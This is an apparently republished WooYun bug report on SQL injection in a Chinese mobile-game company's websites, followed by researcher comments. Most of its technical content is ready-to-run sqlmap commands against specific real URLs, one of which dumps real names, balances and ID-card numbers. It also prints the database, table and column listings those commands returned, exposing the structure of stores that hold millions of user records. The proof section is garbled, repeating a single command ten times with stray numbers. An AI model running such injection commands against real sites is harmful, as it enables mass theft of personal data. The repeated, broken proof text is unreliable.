游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

admin
admin
admin
139190
文章
114
评论
2017年4月23日17:19:13评论334 views字数 240阅读0分48秒阅读模式
摘要

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2016-184694

漏洞标题: 游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

相关厂商: caohua.com

漏洞作者: 黑色键盘丶

提交时间: 2016-04-09 13:33

公开时间: 2016-05-24 14:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射 Mysql 注射技巧

2人收藏

漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

RT

详细说明:

code 区域 
分站POST注入:E:/sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
 sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF
 rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263
 4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da
 ta_UserAccount -C "RealName,CountMoney,IDCard" --dump

----------------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

----------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634"
 --dbs

-------------------------------

code 区域 
E:/sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea
 t&UserName=" --dbs

------------------------------

code 区域 
E:/sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=
 GetQuery&uid=1" --dbs

-----------------------------

code 区域 
E:/sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx
 ?Content=" --dbs

10个裤 都可以查询

游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

数据库:MobPlatform

code 区域 
Database: MobPlatform
 +----------------------------------+---------+
 | Table                            | Entries |
 +----------------------------------+---------+
 | dbo.Data_ProDownLoad             | 6415950 |
 | dbo.Data_CallBackError           | 6067433 |
 | dbo.Data_ProCPA                  | 5775310 |
 | dbo.Data_ProductUsers            | 5586541 |
 | dbo.ExtData_SourcePlanTotalCount | 1663380 |
 | dbo.Data_UserAccount             | 1388708 |
 | dbo.ExtData_UserPlanTotalCount   | 1333119 |
 | dbo.Data_ProductOrder            | 1230833 |
 | dbo.Data_ProCPS                  | 1151720 |
 | dbo.Data_ProductGift             | 1107720 |
 | dbo.ExtData_SourceTotalCount     | 1070893 |
 | dbo.Data_SourcePlanTotalCount    | 976886  |
 | dbo.Data_ProLogin                | 840158  |
 | dbo.Data_UserPlanTotalCount      | 654747  |
 | dbo.ExtData_PlanTotalCount       | 587222  |
 | dbo.ExtData_ProductTotalCount    | 485816  |
 | dbo.Data_PlanTotalCount          | 323250  |
 | dbo.Data_SourceTotalCount        | 145167  |
 | dbo.Data_UserTotalCount          | 84706   |
 | dbo.Base_SourceAPKInfo           | 52370   |
 | dbo.Data_UserPayOrder            | 33938   |
 | dbo.Data_ProductTotalCount       | 26426   |
 | dbo.Base_Server                  | 18644   |
 | dbo.Base_UserAdvertPlan          | 14106   |
 | dbo.Data_GiftCheck               | 10178   |
 | dbo.Data_SourceMoneyToMember     | 9592    |
 | dbo.Data_UserBillRecords         | 6312    |
 | dbo.Base_SourceAdvertPlan        | 5660    |
 | dbo.MS_Menu_Role                 | 3902    |
 | dbo.Data_UserSecret              | 3583    |
 | dbo.PS_SiteData                  | 3523    |
 | dbo.Base_DrawOrders              | 3448    |
 | dbo.Base_UserSource              | 2614    |
 | dbo.Base_UserAccount             | 2232    |
 | dbo.Base_UserInfo                | 2214    |
 | dbo.Base_UserPersonal            | 1162    |
 | dbo.Data_MSDKPayOrders           | 1118    |
 | dbo.Base_UserBankInfo            | 1044    |
 | dbo.Base_ProductGift             | 513     |
 | dbo.Base_SourceHtml              | 469     |
 | dbo.Base_UserCompany             | 382     |
 | dbo.PS_Mixed                     | 309     |
 | dbo.Base_AdvertPlan              | 227     |
 | dbo.MSreplication_objects        | 219     |
 | dbo.Data_SourceChargeApply       | 175     |
 | dbo.Base_ProductInfo             | 169     |
 | dbo.MS_Manager_Role              | 89      |
 | dbo.MS_Manager_Role              | 89      |
 | dbo.BBS_Topic                    | 57      |
 | dbo.PS_ArticleClass              | 53      |
 | dbo.PS_ArticleClass              | 53      |
 | dbo.MS_Role                      | 48      |
 | dbo.Data_UserMoneyInsertPost     | 44      |
 | dbo.PS_AdsClass                  | 23      |
 | dbo.PS_AdsClass                  | 23      |
 | dbo.MS_Dept                      | 18      |
 | dbo.PS_Payment                   | 16      |
 | dbo.Base_Corner                  | 14      |
 | dbo.Base_ProductArticle          | 7       |
 | dbo.SDK_Class                    | 5       |
 | dbo.Base_PackServer              | 4       |
 | dbo.Data_ArticleClass            | 2       |
 | dbo.Data_ProductInfo             | 2       |
 | dbo.CN_Menu                      | 1       |
 | dbo.MS_Config                    | 1       |
 | dbo.MSreplication_subscriptions  | 1       |
 | dbo.MSsubscription_agents        | 1       |
 +----------------------------------+---------+

数据库:MobUsers_DB

code 区域 
Database: MobUsers_DB
 +----------------------+---------+
 | Table                | Entries |
 +----------------------+---------+
 | dbo.Data_UserAccount | 5701357 |
 +----------------------+---------+

数据库:MobGame_DB

code 区域 
Database: MobGame_DB
 +---------------------------------+---------+
 | Table                           | Entries |
 +---------------------------------+---------+
 | dbo.Re_OldUser                  | 4916892 |
 | dbo.Ur_WalletLog                | 2647587 |
 | dbo.Ur_DoWork                   | 1610735 |
 | dbo.SC_GetLog                   | 1497556 |
 | dbo.SC_TaskLog                  | 1497556 |
 | dbo.Us_Info                     | 1374572 |
 | dbo.Ge_GiftCode                 | 1002609 |
 | dbo.Ge_GiftCode                 | 1002609 |
 | dbo.Data_CallBackError          | 632818  |
 | dbo.AC_Player                   | 316155  |
 | dbo.CH_SignLog                  | 243104  |
 | dbo.AC_FinshRole                | 236807  |
 | dbo.Or_PayOrder                 | 182786  |
 | dbo.Or_GameOrder                | 161090  |
 | dbo.CH_RewardLog                | 52355   |
 | dbo.SG_SignLog                  | 49922   |
 | dbo.HP_Integral                 | 38682   |
 | dbo.CH_Player                   | 32054   |
 | dbo.NY_SignLog                  | 30008   |
 | dbo.SI_Info                     | 27695   |
 | dbo.HP_ISDonate                 | 26467   |
 | dbo.CH_GetLog                   | 23399   |
 | dbo.SG_GetLog                   | 22206   |
 | dbo.HL_GetLog                   | 19799   |
 | dbo.HL_DrawLog                  | 19014   |
 | dbo.CH_Order                    | 15963   |
 | dbo.NY_Blessing                 | 13916   |
 | dbo.SI_Player                   | 13011   |
 | dbo.SK_GrabLog                  | 12175   |
 | dbo.SI_GiftLog                  | 10525   |
 | dbo.NY_Player                   | 9888    |
 | dbo.SG_Player                   | 9452    |
 | dbo.RP_GetLog                   | 8559    |
 | dbo.AC_Receive                  | 7889    |
 | dbo.AC_Rotary                   | 7889    |
 | dbo.RP_Player                   | 5868    |
 | dbo.SK_GetLog                   | 5501    |
 | dbo.NY_PayOrder                 | 4339    |
 | dbo.SK_Player                   | 3954    |
 | dbo.PS_SiteData                 | 3523    |
 | dbo.Us_Wallet                   | 3511    |
 | dbo.MK_Order                    | 3246    |
 | dbo.HL_Player                   | 2916    |
 | dbo.Re_Order                    | 2681    |
 | dbo.SI_UserRole                 | 2550    |
 | dbo.NY_ClockLog                 | 2089    |
 | dbo.RP_Order                    | 1933    |
 | dbo.MS_Menu_Role                | 1915    |
 | dbo.MK_GetLog                   | 1854    |
 | dbo.HL_ExchangeGiftCode         | 1804    |
 | dbo.HL_ExchangeGiftCode         | 1804    |
 | dbo.MK_Player                   | 988     |
 | dbo.MSreplication_objects       | 303     |
 | dbo.Ge_Info                     | 119     |
 | dbo.SK_Gift                     | 96      |
 | dbo.Ur_Work                     | 92      |
 | dbo.PM_Order                    | 71      |
 | dbo.MS_Manager_Role             | 42      |
 | dbo.MS_Manager_Role             | 42      |
 | dbo.SC_PlayerPlace              | 34      |
 | dbo.SC_PlayerPlace              | 34      |
 | dbo.PS_ArticleClass             | 22      |
 | dbo.PS_ArticleClass             | 22      |
 | dbo.PS_AdsClass                 | 19      |
 | dbo.PS_AdsClass                 | 19      |
 | dbo.PS_Mixed                    | 18      |
 | dbo.AC_Prize                    | 17      |
 | dbo.SG_Gift                     | 15      |
 | dbo.SK_TimeField                | 15      |
 | dbo.HL_Gift                     | 13      |
 | dbo.MS_Role                     | 12      |
 | dbo.SC_Scratch                  | 11      |
 | dbo.AC_Gift                     | 10      |
 | dbo.CH_Gift                     | 10      |
 | dbo.MR_Rank                     | 10      |
 | dbo.PS_Payment                  | 10      |
 | dbo.SI_Gitf                     | 10      |
 | dbo.MK_Rebate                   | 8       |
 | dbo.RP_Gift                     | 8       |
 | dbo.SC_Gift                     | 8       |
 | dbo.System_Configs              | 8       |
 | dbo.MS_Dept                     | 7       |
 | dbo.NY_Gift                     | 7       |
 | dbo.PM_Product                  | 5       |
 | dbo.Ms_Config                   | 4       |
 | dbo.Re_Info                     | 4       |
 | dbo.SK_Seckill                  | 4       |
 | dbo.Data_Discount               | 3       |
 | dbo.AC_Role                     | 2       |
 | dbo.HL_Turntable                | 2       |
 | dbo.RP_TimeField                | 2       |
 | dbo.SG_Role                     | 2       |
 | dbo.CH_Role                     | 1       |
 | dbo.HP_Donate                   | 1       |
 | dbo.MK_Role                     | 1       |
 | dbo.MSreplication_subscriptions | 1       |
 | dbo.MSsubscription_agents       | 1       |
 | dbo.NY_NewYear                  | 1       |
 | dbo.RP_RedPackets               | 1       |
 | dbo.SI_Role                     | 1       |
 +---------------------------------+---------+

这个裤还有可以整出论坛的

code 区域 
Database: MobGame_DB
 Table: Us_Info
 [19 columns]
 +----------------+----------+
 | Column         | Type     |
 +----------------+----------+
 | Active         | int      |
 | AddDateTime    | datetime |
 | BBSPwd         | varchar  |
 | Birthday       | datetime |
 | Email          | varchar  |
 | GiveMoney      | decimal  |
 | IDCard         | varchar  |
 | Install        | int      |
 | LoginName      | varchar  |
 | NickName       | varchar  |
 | Password       | varchar  |
 | Pay            | decimal  |
 | QQ             | varchar  |
 | Rank_ID        | int      |
 | RealName       | varchar  |
 | Status         | char     |
 | Tel            | varchar  |
 | Token          | varchar  |
 | UpdateDateTime | datetime |
 +----------------+----------+

跑了几个数据量大的 还有几个就不一一演示了

漏洞证明:

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

0

----------------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

1

----------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

2

-------------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

3

------------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

4

-----------------------------

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

5

10个裤 都可以查询

游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

数据库:MobPlatform

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

6

数据库:MobUsers_DB

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

7

数据库:MobGame_DB

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

8

这个裤还有可以整出论坛的

code 区域 
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
 4" --current-db

9

跑了几个数据量大的 还有几个就不一一演示了

修复方案:

你懂的

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-09 14:20

厂商回复:

数据库可跨库查询,信息泄露

最新状态:

2016-05-06:已修复

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-09 11:57 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    1

    游戏厂商都送礼了 嘻嘻 不知道这个有没有

  2. 2016-04-09 17:41 | Exploit DB ( 普通白帽子 | Rank:699 漏洞数:156 | 水能载舟,亦可覆舟。)

    1

    @黑色键盘丶 大胸弟 是两个GET一个POST吗

  3. 2016-04-09 17:45 | Exploit DB ( 普通白帽子 | Rank:699 漏洞数:156 | 水能载舟,亦可覆舟。)

    1

    @黑色键盘丶 三处GET

  4. 2016-04-09 17:46 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    1

    @Exploit DB 我提交了6处

  5. 2016-04-09 17:48 | Exploit DB ( 普通白帽子 | Rank:699 漏洞数:156 | 水能载舟,亦可覆舟。)

    1

    @黑色键盘丶 留个qq交流一下。 我这初步测试发现了四处 你说我六处是指同一个网站下有不同参数的注入还是不同的网站? 就是子域名。

  6. 2016-04-09 18:33 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    1

    @Exploit DB 1

  7. 2016-05-24 19:20 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)

    0

    QWQ

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin